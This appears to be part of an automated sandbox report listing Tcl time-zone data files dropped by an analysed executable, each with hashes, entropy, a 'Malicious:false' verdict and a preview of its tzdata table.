                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chicago) {.. {-9223372036854775808 -21036 0 LMT}.. {-2717647200 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-1577901600 -21600 0 CST}.. {-1563724800 -18000 1 CDT}.. {-1551632400 -21600 0 CST}.. {-1538928000 -18000 1 CDT}.. {-1520182800 -21600 0 CST}.. {-1504454400 -18000 1 CDT}.. {-1491757200 -21600 0 CST}.. {-1473004800 -18000 1 CDT}.. {-1459702800 -21600 0 CST}.. {-1441555200 -18000 1 CDT}.. {-1428253200 -21600 0 CST}.. {-1410105600 -18000 1 CDT}.. {-1396803600 -21600 0 CST}.. {-1378656000 -18000 1 CDT}.. {-1365354000 -21600 0 CST}.. {-1347206400 -18000 1 CDT}.. {-1333904400 -21600 0 CST}.. {-1315152000 -18000 1 CDT}.. {-1301850000 -21600 0 CST}.. {-1283702400 -18000 1 CDT}.. {-1270400400 -21600 0 CST}.. {-1252252800 -18000 1 CDT}.. {-1238950800
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2040
                                                                                                                                                                                                                              Entropy (8bit):4.006586050664275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5wE2e49WU0S+VS+TjV/NF01YmM/parZ375+XiBn:5wEvU033FS1YrpaV5+yBn
                                                                                                                                                                                                                              MD5:67738E07092EDB5A9F484ED5CA217EFB
                                                                                                                                                                                                                              SHA1:9E428C67AE4BDACA48D189DF60374F3B6523E120
                                                                                                                                                                                                                              SHA-256:93438D65EA8F95691748FF749219FAFA1940469BC61CED0B7CBF995B417F20B4
                                                                                                                                                                                                                              SHA-512:57C9FE7EAE37504465F33B2AB079ED91700528E330D227E94AE8A06C58DEFA65F1EA1CDF89F835910D92D037DADB45E684A2EA96512B08F83650DD33CCEB8EB6
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Chihuahua) {.. {-9223372036854775808 -25460 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):192
                                                                                                                                                                                                                              Entropy (8bit):4.844590153688034
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0u55DyXHAIg20u5cvRL/2IAcGE9WtEaQXs+IAcGEi:SlSWB9vsM3y7oDSHAIgpdN/2909qEacn
                                                                                                                                                                                                                              MD5:A0BF04CD77026DC1D2749848AB0EE45E
                                                                                                                                                                                                                              SHA1:EA0F1BC11379DF2E421675BC5DE4805CE94B96D6
                                                                                                                                                                                                                              SHA-256:C8CBF5A29CC1D0827390CA6E98B2EFCF90743C6DD0ECA143B300050DD4164041
                                                                                                                                                                                                                              SHA-512:61968B4E42ECC60C801F959D18D13187AD39D9B81FA1A947F6B6862F99D73E3A30849AC4233DB5705D46F5373C42D8748B15BE9B82822971B4F47E601E5766D8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Panama)]} {.. LoadTimeZoneFile America/Panama..}..set TZData(:America/Coral_Harbour) $TZData(:America/Panama)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):219
                                                                                                                                                                                                                              Entropy (8bit):4.78887878252354
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7/MSHAIgp/M1ovN/29093+90/M7:MByMY/M7p/M16t290c90/M7
                                                                                                                                                                                                                              MD5:C7CCF5CEC7AA60D6063D1C30F4263ADC
                                                                                                                                                                                                                              SHA1:FD8E9AEEEE50656FD3C694CA051895DDC8E5590B
                                                                                                                                                                                                                              SHA-256:28B84710EADEF7AD5E7FA63EF519A9D93996D3BB91DD9018333DE3AC4D8FB8DD
                                                                                                                                                                                                                              SHA-512:6974F8B238977EE5222368C4B79327BB240580819FCA082261D6994781144D81E2E8843B4F1C9D07EFBEE27311C8930BDAC9C0D6D6718F6FB1600D0000576CDE
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Cordoba)]} {.. LoadTimeZoneFile America/Argentina/Cordoba..}..set TZData(:America/Cordoba) $TZData(:America/Argentina/Cordoba)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):431
                                                                                                                                                                                                                              Entropy (8bit):4.506976345480408
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290lnmdHd5CvZN/Mi3yvI8/uF+wSJz/uF+IA/uF+i/X8/uF+ZDVxNv:5mnedIvZN/e5S+w+S+LS+i0S+pB
                                                                                                                                                                                                                              MD5:0446EF1A6985A62EDFFB9FFAC7F1DE0E
                                                                                                                                                                                                                              SHA1:A43468E120E585E2DCC20205BA1D1E2CCB6C0BC2
                                                                                                                                                                                                                              SHA-256:E3061DC6FA9F869F013351A9FDF420448592D7F959C2B4404093432508146F7E
                                                                                                                                                                                                                              SHA-512:86D41B0C49489572C3EAEDD5466AA92319C721CCEC9437EBB0F2AAD772FB5ED91A2F2061E00448FB48096B0BAAE9A4E1E644F8AF595B76BE05DBC0C801E6D6ED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Costa_Rica) {.. {-9223372036854775808 -20173 0 LMT}.. {-2524501427 -20173 0 SJMT}.. {-1545071027 -21600 0 CST}.. {288770400 -18000 1 CDT}.. {297234000 -21600 0 CST}.. {320220000 -18000 1 CDT}.. {328683600 -21600 0 CST}.. {664264800 -18000 1 CDT}.. {678344400 -21600 0 CST}.. {695714400 -18000 1 CDT}.. {700635600 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.8664633847782905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0utLaDovXHAIg20utLRYovHRL/2IAcGE9mM7x/h4y:SlSWB9vsM3y7OBHAIgpONYyHN/2909vr
                                                                                                                                                                                                                              MD5:0757DD22C0E297CCE8E6678ECA4B39C7
                                                                                                                                                                                                                              SHA1:81B31299F9A35C8BA2EC1F59EC21129FFCDCD52F
                                                                                                                                                                                                                              SHA-256:A01DDB460420C8765CE8EF7A7D031ABD7BDB17CFA548E7C3B8574C388AA21E17
                                                                                                                                                                                                                              SHA-512:F1AFC0F6371A10E4CB74FB2C8985610AEE6C3511861BC09384EDC99D250E9099A1F4430BFC3B0B396C2702BF9991A5A4ECFD53A82C92883460715FA2C1E04579
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Phoenix)]} {.. LoadTimeZoneFile America/Phoenix..}..set TZData(:America/Creston) $TZData(:America/Phoenix)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2912
                                                                                                                                                                                                                              Entropy (8bit):3.588248620238414
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5tSeSFESoSQSrSsCSeSPS1cSQSQlSsSyZS2SqLSwZS4vSoSUSLpSzS4X3/SxS1S4:rVsE3LMuJALTvn1ZdP7ZbvLfeAh+KIil
                                                                                                                                                                                                                              MD5:264E0CEA9491B404993594E64F13479F
                                                                                                                                                                                                                              SHA1:6D4D277FA470A2C7AD0A59B5DA3CC15BEEB74E78
                                                                                                                                                                                                                              SHA-256:2D8281CF3FD9E859C5206F781E264854FA876CB36562A08C6C01343C65F8A508
                                                                                                                                                                                                                              SHA-512:759C19B4DD0E1F7F1176872806BFB1F17ADF9C992E41B96FEA67D77DD67E9DD3C1683E3B6D27FB092C731F534C6A7441BACFFF0301907217A064523B86992E23
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Cuiaba) {.. {-9223372036854775808 -13460 0 LMT}.. {-1767212140 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):201
                                                                                                                                                                                                                              Entropy (8bit):4.876961543280111
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/2909C4e90ppv:MByMYbpwt290690b
                                                                                                                                                                                                                              MD5:9459043060E33E8EDC74E78332E96EDF
                                                                                                                                                                                                                              SHA1:27963FE063965584D0F226BAE9A08EB2954398F0
                                                                                                                                                                                                                              SHA-256:ACCF08CF53C9431E226714DF8BEDE3C91BAF62D5BD7B98CA8B50D7258124D129
                                                                                                                                                                                                                              SHA-512:215D9AFAA7227F4447177CE2ABA5A6F7F2F46A9D787845DD32F10D5C22BF9CBE4047AF5E0E66FA7A4F70EEE064A7EC7B67949E565C3C5C60C31F3C19D6915D76
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Curacao) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1128
                                                                                                                                                                                                                              Entropy (8bit):3.8794180227436557
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5geNrmFQqFi77FkiVFw1ZFt9SFUXDFH9vMF0mFdS/FyMF8AWXF7HFEJF7cSXHVFS:5/vx7O11pbzvZ+S0xAqe12vey
                                                                                                                                                                                                                              MD5:6E37A78AC686A6B48A78541E1900E33C
                                                                                                                                                                                                                              SHA1:D41F39FDB6D45921B57341E95A006251B4875961
                                                                                                                                                                                                                              SHA-256:968C56F1D0106E1D92C7B094EEF528B6EE1FFA3D7A18BE2F2BA59178C2C0F1E0
                                                                                                                                                                                                                              SHA-512:397623149D95FF9A094750EE697F62DF90124BBBE407FB49FBAE335A61629449F2A61EF4471DBD57745B323DFCF3628611CAE9295F2EF7E4A7412A697651FF68
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Danmarkshavn) {.. {-9223372036854775808 -4480 0 LMT}.. {-1686091520 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -72
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2967
                                                                                                                                                                                                                              Entropy (8bit):3.9564096415565855
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5IeVvxBn4nRfngnSSXRwEg7MkwY7Twbg7Uwr70vwHg7b6wa7gAHwc7/wzZg7ywJP:5zxKKpj/AOZFCARCeQbvb5wxMN6Ix
                                                                                                                                                                                                                              MD5:F494405F3B250668BE00DC3864B9A2DC
                                                                                                                                                                                                                              SHA1:20843AD6D95DD5D5950E2946BCAE4ECE2B676F70
                                                                                                                                                                                                                              SHA-256:30E875343C81C8DE473E6313A27C55315F38E7CCDBD2CEE5783EC54D269D5807
                                                                                                                                                                                                                              SHA-512:9102BD114436D5FE5A1942E31AE692ECE41F910AC1B6E52C02283801D5AA00CFF22D980C61E69928267D3DD34331E301C7324CA631B71AC2FBBDE06D7914F849
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson) {.. {-9223372036854775808 -33460 0 LMT}.. {-2188996940 -32400 0 YST}.. {-1632056400 -28800 1 YDT}.. {-1615125600 -32400 0 YST}.. {-1596978000 -28800 1 YDT}.. {-1583164800 -32400 0 YST}.. {-880203600 -28800 1 YWT}.. {-769395600 -28800 1 YPT}.. {-765381600 -32400 0 YST}.. {-147884400 -25200 1 YDDT}.. {-131554800 -32400 0 YST}.. {315561600 -28800 0 PST}.. {325677600 -25200 1 PDT}.. {341398800 -28800 0 PST}.. {357127200 -25200 1 PDT}.. {372848400 -28800 0 PST}.. {388576800 -25200 1 PDT}.. {404902800 -28800 0 PST}.. {420026400 -25200 1 PDT}.. {436352400 -28800 0 PST}.. {452080800 -25200 1 PDT}.. {467802000 -28800 0 PST}.. {483530400 -25200 1 PDT}.. {499251600 -28800 0 PST}.. {514980000 -25200 1 PDT}.. {530701200 -28800 0 PST}.. {544615200 -25200 1 PDT}.. {562150800 -28800 0 PST}.. {576064800 -25200 1 PDT}.. {594205200 -28800 0 P
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1940
                                                                                                                                                                                                                              Entropy (8bit):4.024810417421672
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5/eUv5wk7Zw9JmnRsw78wP+7bw+7zwN7SynwpBZ7Fwk47H+wW73wo5775w572Iwl:5DuY/YRRvkGZ+R64CjSUlTGS
                                                                                                                                                                                                                              MD5:7868720D39782147B2BD6B039A5BF7E0
                                                                                                                                                                                                                              SHA1:6F66404E5CCFF7F020269A316D792D5E7AD4C280
                                                                                                                                                                                                                              SHA-256:540804BECDEAB92340EF02D32A62BFD550B71A3DB8D829BE426EE4D210004643
                                                                                                                                                                                                                              SHA-512:9CCD124FF954CA2988F07286FFE9ED740E0CEF5F4D76BF090367B74A577E91BF5590EDFE12AFC83ACF5CBFC88C5A68867C58082A2777D08C326A7B18889B08E2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Dawson_Creek) {.. {-9223372036854775808 -28856 0 LMT}.. {-2713881544 -28800 0 PST}.. {-1632060000 -25200 1 PDT}.. {-1615129200 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-725817600 -28800 0 PST}.. {-715788000 -25200 1 PDT}.. {-702486000 -28800 0 PST}.. {-684338400 -25200 1 PDT}.. {-671036400 -28800 0 PST}.. {-652888800 -25200 1 PDT}.. {-639586800 -28800 0 PST}.. {-620834400 -25200 1 PDT}.. {-608137200 -28800 0 PST}.. {-589384800 -25200 1 PDT}.. {-576082800 -28800 0 PST}.. {-557935200 -25200 1 PDT}.. {-544633200 -28800 0 PST}.. {-526485600 -25200 1 PDT}.. {-513183600 -28800 0 PST}.. {-495036000 -25200 1 PDT}.. {-481734000 -28800 0 PST}.. {-463586400 -25200 1 PDT}.. {-450284400 -28800 0 PST}.. {-431532000 -25200 1 PDT}.. {-418230000 -28800 0 PST}.. {-400082400 -25200 1 PDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8920
                                                                                                                                                                                                                              Entropy (8bit):3.8540632258197514
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:gjGtwmGaLV911sF7Lv/PCewtA8CzSPyDLbrcUia:gUwDPlLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:0D649599A899ECB3FCF2783DCEE3E37B
                                                                                                                                                                                                                              SHA1:ACC796BE75F41A12FB1F8CCBD2B2839AF9876FFE
                                                                                                                                                                                                                              SHA-256:3FE2EE8C05C5D6F268B58BD9FC3E3A845DEA257473B29F7B3FB403E917448F3C
                                                                                                                                                                                                                              SHA-512:C10D41AB95439B8E978F12F9F58D1ACC9AD15404123FA5FBA0D1CC716E5CF5DA6BD2252450055AC3998DBCB8DD49F7A82ACD53413E3EE78CDA2C42F603DE2C56
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Denver) {.. {-9223372036854775808 -25196 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-1577898000 -25200 0 MST}.. {-1570374000 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1538924400 -21600 1 MDT}.. {-1534089600 -25200 0 MST}.. {-883587600 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-757357200 -25200 0 MST}.. {-147884400 -21600 1 MDT}.. {-131558400 -25200 0 MST}.. {-116434800 -21600 1 MDT}.. {-100108800 -25200 0 MST}.. {-94669200 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -2
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8430
                                                                                                                                                                                                                              Entropy (8bit):3.826664943157435
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:SGiS1A5tCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:SG/K5ItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:2BBA922E9377D257CBDF6E1367BBB1A2
                                                                                                                                                                                                                              SHA1:6F33A44834E8041E78660A326A5DDAF3D7F9DC2A
                                                                                                                                                                                                                              SHA-256:84F6897B87D3978D30D35097B78C55434CE55EB65D6E488A391DFC3B3BB5A8FE
                                                                                                                                                                                                                              SHA-512:D225824945C08A3521A8288B92B26DFFA712ED3505E72DEDE4A7D1777E58DEA79ADF3F042D22624E4142DD4203BAA4DFF8EB08B7033FDF00059F6C39954EA1A1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Detroit) {.. {-9223372036854775808 -19931 0 LMT}.. {-2051202469 -21600 0 CST}.. {-1724083200 -18000 0 EST}.. {-883594800 -18000 0 EST}.. {-880218000 -14400 1 EWT}.. {-769395600 -14400 1 EPT}.. {-765396000 -18000 0 EST}.. {-757364400 -18000 0 EST}.. {-684349200 -14400 1 EDT}.. {-671047200 -18000 0 EST}.. {-80506740 -14400 0 EDT}.. {-68666400 -18000 0 EST}.. {-52938000 -14400 1 EDT}.. {-37216800 -18000 0 EST}.. {-31518000 -18000 0 EST}.. {94712400 -18000 0 EST}.. {104914800 -14400 1 EDT}.. {120636000 -18000 0 EST}.. {126687600 -14400 1 EDT}.. {152085600 -18000 0 EST}.. {157784400 -18000 0 EST}.. {167814000 -14400 0 EDT}.. {183535200 -18000 0 EST}.. {199263600 -14400 1 EDT}.. {215589600 -18000 0 EST}.. {230713200 -14400 1 EDT}.. {247039200 -18000 0 EST}.. {262767600 -14400 1 EDT}.. {278488800 -18000 0 EST}.. {294217200 -14400 1 EDT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.86856578093135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290TL3290ppv:MByMYbpwt290Tr290b
                                                                                                                                                                                                                              MD5:398D8DBB24CEA2D174EF05F63869C94A
                                                                                                                                                                                                                              SHA1:6D0E04165952E873E6ECA33A0E54761B747F0A98
                                                                                                                                                                                                                              SHA-256:3DA98AA7D3085845779BE8ED6C93CCBDA92191F17CA67BBF779803E21DA2ABF3
                                                                                                                                                                                                                              SHA-512:2652AFD1A3F8A4B84078A964005FE10C64491EC2D47CDE57D5066D07D1D837308FD696F53B9E7B6B0E72F86F9A85128B8CBF5F302F91EADE6D840DF946DE85CD
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Dominica) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8600
                                                                                                                                                                                                                              Entropy (8bit):3.8579895970456137
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:7SabOGaLm911sF7Lv/PCewtA8CzSPyDLbrcUia:7vf4lLv/PCenJzS6cy
                                                                                                                                                                                                                              MD5:EBD169ECA4D45EED28BF7B27809361BC
                                                                                                                                                                                                                              SHA1:E89C8484A29D792FB6349CFDFDD30C2FA6B78B6B
                                                                                                                                                                                                                              SHA-256:026D51D73D30A3710288F440E0C337E44E3A14D0AA2D7B6C6E53AF43FC72A90C
                                                                                                                                                                                                                              SHA-512:45C936ED7D4AF95261180547013454AAEC9FA7672B52AC6077DD99D9FEB6DDD57652FE4EC67BF81F1588384F3027A1872E0C72D9CAEB980B66D2CB6EE9B8ABB0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Edmonton) {.. {-9223372036854775808 -27232 0 LMT}.. {-1998663968 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1600614000 -21600 1 MDT}.. {-1596816000 -25200 0 MST}.. {-1567954800 -21600 1 MDT}.. {-1551628800 -25200 0 MST}.. {-1536505200 -21600 1 MDT}.. {-1523203200 -25200 0 MST}.. {-1504450800 -21600 1 MDT}.. {-1491753600 -25200 0 MST}.. {-1473001200 -21600 1 MDT}.. {-1459699200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {136371600 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {167821200 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {23072
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1230
                                                                                                                                                                                                                              Entropy (8bit):3.7989525000422963
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5OXUepdkZss/uuD/uVK/uNC/uvFe/uxJs/u74O/u83C/uc8J/uhF8/uNHs/ulU6w:5OXCZsMw57XJh4CxUF/A6GTrtSUUhfL0
                                                                                                                                                                                                                              MD5:6766E75702D8C2D1C986DFCEFCE554F9
                                                                                                                                                                                                                              SHA1:39553F80D82BC0134FAF70C9830B96BDCBCEFF1C
                                                                                                                                                                                                                              SHA-256:48FC987E5999EA79F24797E0450FE4DAB7CF320DFAD7A47A8A1E037077EC42C9
                                                                                                                                                                                                                              SHA-512:A812D0D4254BB0B7DB7AE116652D2A8F97D22C59F2709A17D1CE435FCFB38B807A4E0ED6EA114A66897E29D85226875FA84D28B254A5D17BD1CBA95FAD8349B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
